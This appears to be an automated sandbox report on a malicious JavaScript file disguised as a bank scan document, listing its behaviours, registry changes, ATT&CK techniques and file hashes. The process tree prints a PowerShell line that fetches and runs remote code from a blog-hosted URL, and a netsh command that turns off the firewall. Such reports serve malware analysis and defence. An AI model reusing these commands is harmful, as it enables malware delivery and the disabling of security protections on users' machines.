Analysis
-
max time kernel
137s -
max time network
198s -
platform
windows11-21h2_x64 -
resource
win11-20231222-en -
resource tags
arch:x64arch:x86image:win11-20231222-enlocale:en-usos:windows11-21h2-x64system -
submitted
16-01-2024 10:45
Static task
static1
Behavioral task
behavioral1
Sample
New_ScanDoc#092387CHASEeAdvice.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
New_ScanDoc#092387CHASEeAdvice.js
Resource
win10-20231215-en
Behavioral task
behavioral3
Sample
New_ScanDoc#092387CHASEeAdvice.js
Resource
win10v2004-20231215-en
Behavioral task
behavioral4
Sample
New_ScanDoc#092387CHASEeAdvice.js
Resource
win11-20231222-en
General
-
Target
New_ScanDoc#092387CHASEeAdvice.js
-
Size
1.4MB
-
MD5
286d534eb759c671fa9e79cfafd3bc85
-
SHA1
d165938c1c607618c5cb6d9d11cf5b371f007ac7
-
SHA256
77109ba56a5e70fafe88a10800764ec30d35727c1ff8cdb2934534ae8c7e048b
-
SHA512
3b1ee1a647b623265ad7e90d786e61cafe6ca5e312676dafcc198763cf8efe3f479fb66b4aae9d1e7289ec5433055ab193ffd91abefc732e3d337d4fe987119b
-
SSDEEP
192:FQzfvQzrHHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHHnHHHHHHf:efYzD
Malware Config
Signatures
-
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 2 4332 powershell.exe 3 4332 powershell.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Registers COM server for autorun 1 TTPs 2 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Software\Microsoft\Windows\CurrentVersion\Run\Deissl1 = "schtasks /run /tn Deissl1" powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 20 api.ipify.org 28 api.ipify.org 18 ip-api.com -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exedescription pid process target process PID 4332 set thread context of 3480 4332 powershell.exe RegSvcs.exe PID 4332 set thread context of 3016 4332 powershell.exe RegSvcs.exe PID 4332 set thread context of 2312 4332 powershell.exe Msbuild.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 14 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
dw20.exedw20.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision dw20.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
dw20.exedw20.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe -
Modifies registry class 3 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} powershell.exe Key created \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exeRegSvcs.exepid process 4332 powershell.exe 4332 powershell.exe 4332 powershell.exe 4332 powershell.exe 4332 powershell.exe 4332 powershell.exe 3480 RegSvcs.exe 3480 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeRegSvcs.exedw20.exedw20.exedescription pid process Token: SeDebugPrivilege 4332 powershell.exe Token: SeDebugPrivilege 3480 RegSvcs.exe Token: SeRestorePrivilege 4916 dw20.exe Token: SeBackupPrivilege 4916 dw20.exe Token: SeBackupPrivilege 4916 dw20.exe Token: SeBackupPrivilege 4916 dw20.exe Token: SeBackupPrivilege 2868 dw20.exe Token: SeBackupPrivilege 2868 dw20.exe Token: SeIncreaseQuotaPrivilege 4332 powershell.exe Token: SeSecurityPrivilege 4332 powershell.exe Token: SeTakeOwnershipPrivilege 4332 powershell.exe Token: SeLoadDriverPrivilege 4332 powershell.exe Token: SeSystemProfilePrivilege 4332 powershell.exe Token: SeSystemtimePrivilege 4332 powershell.exe Token: SeProfSingleProcessPrivilege 4332 powershell.exe Token: SeIncBasePriorityPrivilege 4332 powershell.exe Token: SeCreatePagefilePrivilege 4332 powershell.exe Token: SeBackupPrivilege 4332 powershell.exe Token: SeRestorePrivilege 4332 powershell.exe Token: SeShutdownPrivilege 4332 powershell.exe Token: SeDebugPrivilege 4332 powershell.exe Token: SeSystemEnvironmentPrivilege 4332 powershell.exe Token: SeRemoteShutdownPrivilege 4332 powershell.exe Token: SeUndockPrivilege 4332 powershell.exe Token: SeManageVolumePrivilege 4332 powershell.exe Token: 33 4332 powershell.exe Token: 34 4332 powershell.exe Token: 35 4332 powershell.exe Token: 36 4332 powershell.exe Token: SeIncreaseQuotaPrivilege 4332 powershell.exe Token: SeSecurityPrivilege 4332 powershell.exe Token: SeTakeOwnershipPrivilege 4332 powershell.exe Token: SeLoadDriverPrivilege 4332 powershell.exe Token: SeSystemProfilePrivilege 4332 powershell.exe Token: SeSystemtimePrivilege 4332 powershell.exe Token: SeProfSingleProcessPrivilege 4332 powershell.exe Token: SeIncBasePriorityPrivilege 4332 powershell.exe Token: SeCreatePagefilePrivilege 4332 powershell.exe Token: SeBackupPrivilege 4332 powershell.exe Token: SeRestorePrivilege 4332 powershell.exe Token: SeShutdownPrivilege 4332 powershell.exe Token: SeDebugPrivilege 4332 powershell.exe Token: SeSystemEnvironmentPrivilege 4332 powershell.exe Token: SeRemoteShutdownPrivilege 4332 powershell.exe Token: SeUndockPrivilege 4332 powershell.exe Token: SeManageVolumePrivilege 4332 powershell.exe Token: 33 4332 powershell.exe Token: 34 4332 powershell.exe Token: 35 4332 powershell.exe Token: 36 4332 powershell.exe Token: SeIncreaseQuotaPrivilege 4332 powershell.exe Token: SeSecurityPrivilege 4332 powershell.exe Token: SeTakeOwnershipPrivilege 4332 powershell.exe Token: SeLoadDriverPrivilege 4332 powershell.exe Token: SeSystemProfilePrivilege 4332 powershell.exe Token: SeSystemtimePrivilege 4332 powershell.exe Token: SeProfSingleProcessPrivilege 4332 powershell.exe Token: SeIncBasePriorityPrivilege 4332 powershell.exe Token: SeCreatePagefilePrivilege 4332 powershell.exe Token: SeBackupPrivilege 4332 powershell.exe Token: SeRestorePrivilege 4332 powershell.exe Token: SeShutdownPrivilege 4332 powershell.exe Token: SeDebugPrivilege 4332 powershell.exe Token: SeSystemEnvironmentPrivilege 4332 powershell.exe -
Suspicious use of WriteProcessMemory 38 IoCs
Processes:
wscript.exepowershell.execsc.exeRegSvcs.exeMsbuild.exedescription pid process target process PID 452 wrote to memory of 4332 452 wscript.exe powershell.exe PID 452 wrote to memory of 4332 452 wscript.exe powershell.exe PID 4332 wrote to memory of 2848 4332 powershell.exe csc.exe PID 4332 wrote to memory of 2848 4332 powershell.exe csc.exe PID 2848 wrote to memory of 4480 2848 csc.exe cvtres.exe PID 2848 wrote to memory of 4480 2848 csc.exe cvtres.exe PID 4332 wrote to memory of 1604 4332 powershell.exe netsh.exe PID 4332 wrote to memory of 1604 4332 powershell.exe netsh.exe PID 4332 wrote to memory of 3480 4332 powershell.exe RegSvcs.exe PID 4332 wrote to memory of 3480 4332 powershell.exe RegSvcs.exe PID 4332 wrote to memory of 3480 4332 powershell.exe RegSvcs.exe PID 4332 wrote to memory of 3480 4332 powershell.exe RegSvcs.exe PID 4332 wrote to memory of 3480 4332 powershell.exe RegSvcs.exe PID 4332 wrote to memory of 3480 4332 powershell.exe RegSvcs.exe PID 4332 wrote to memory of 3480 4332 powershell.exe RegSvcs.exe PID 4332 wrote to memory of 3480 4332 powershell.exe RegSvcs.exe PID 4332 wrote to memory of 3016 4332 powershell.exe RegSvcs.exe PID 4332 wrote to memory of 3016 4332 powershell.exe RegSvcs.exe PID 4332 wrote to memory of 3016 4332 powershell.exe RegSvcs.exe PID 4332 wrote to memory of 3016 4332 powershell.exe RegSvcs.exe PID 4332 wrote to memory of 3016 4332 powershell.exe RegSvcs.exe PID 4332 wrote to memory of 3016 4332 powershell.exe RegSvcs.exe PID 4332 wrote to memory of 3016 4332 powershell.exe RegSvcs.exe PID 4332 wrote to memory of 3016 4332 powershell.exe RegSvcs.exe PID 3016 wrote to memory of 4916 3016 RegSvcs.exe dw20.exe PID 3016 wrote to memory of 4916 3016 RegSvcs.exe dw20.exe PID 3016 wrote to memory of 4916 3016 RegSvcs.exe dw20.exe PID 4332 wrote to memory of 2312 4332 powershell.exe Msbuild.exe PID 4332 wrote to memory of 2312 4332 powershell.exe Msbuild.exe PID 4332 wrote to memory of 2312 4332 powershell.exe Msbuild.exe PID 4332 wrote to memory of 2312 4332 powershell.exe Msbuild.exe PID 4332 wrote to memory of 2312 4332 powershell.exe Msbuild.exe PID 4332 wrote to memory of 2312 4332 powershell.exe Msbuild.exe PID 4332 wrote to memory of 2312 4332 powershell.exe Msbuild.exe PID 4332 wrote to memory of 2312 4332 powershell.exe Msbuild.exe PID 2312 wrote to memory of 2868 2312 Msbuild.exe dw20.exe PID 2312 wrote to memory of 2868 2312 Msbuild.exe dw20.exe PID 2312 wrote to memory of 2868 2312 Msbuild.exe dw20.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\New_ScanDoc#092387CHASEeAdvice.js1⤵
- Suspicious use of WriteProcessMemory
PID:452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm simoubizw.blogspot.com///////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 62⤵
- UAC bypass
- Blocklisted process makes network request
- Registers COM server for autorun
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4332 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uxfqdz1a\uxfqdz1a.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5728.tmp" "c:\Users\Admin\AppData\Local\Temp\uxfqdz1a\CSCBA3B8444E65B4789B288C213A648995.TMP"4⤵PID:4480
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue3⤵
- Modifies Windows Firewall
PID:1604 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3480 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 8004⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4916 -
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 8004⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2868
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD59df310e571587ef5d6f9271dd742da03
SHA1adbd4d48b7e34ca53a9e6192fbd97c28dbbc44ea
SHA2565931f4bc97e519cb65351f874f5ac85a11510225b9d0483cc795c29af104bdc4
SHA5124ee35307bec1101d730102a8f6414f4bb68e0035de377e3f3a0461dcd36e3e31f837a45033ab422fc16852875f633c492d9a096e23609b3068afe5d4c4852d16
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5df2b079fd225b145e3f4e9450b1b7949
SHA1e5fa96b7de63e8316c0c8edb3b0322603c44dd2e
SHA256a49df7b321367cf606d102050712b5ea51ac3aac0808a0bb7ad19a9b7b83d480
SHA512acae3386885e2ab05724ae10dcf55ac8cc1759fafa551de9c0fee70d9687b016e27c8eb24a9fa05372c8bd10eff02d00e775d9308b38d44c37cf71483d4d5740
-
Filesize
652B
MD5aa3cc8686cb07e4ee766e1d57d762821
SHA13dc7d28192b5dc21236d9128b095e181011a022d
SHA256d3d121816d9db87094a7d95b47370d53a1772b41be6f29adec0c17234b43126a
SHA5123fffcebc8da6987976f1c99d695720f8fe4a1b48bdccd9f5db05c77a61ec81d16f851f98c530787009eac0edae088e080fbffc8c4cb5502226baa3defe48588d
-
Filesize
870B
MD5e06ebf853695db38aaac82c9af297ae4
SHA1ef98bacec5ac2ae3bf24aac8ed56935a25c1f064
SHA25679c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344
SHA512036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759
-
Filesize
369B
MD5e878b39ea67eaa28e40b776aedfb970e
SHA13aae00ceef102087ff0a193200b888cdc47a2e9a
SHA256c8eeaf61c4681db5648d788679aa10855be494b39a1344b0100db32ad08d398e
SHA51221d3f783e4d540400756c750cdb5aac4d085fe7261026236f5b2b55e857e6c435a0ec97989a273a9edd37d3968d15d44788036e4a923325b22277835f3863be1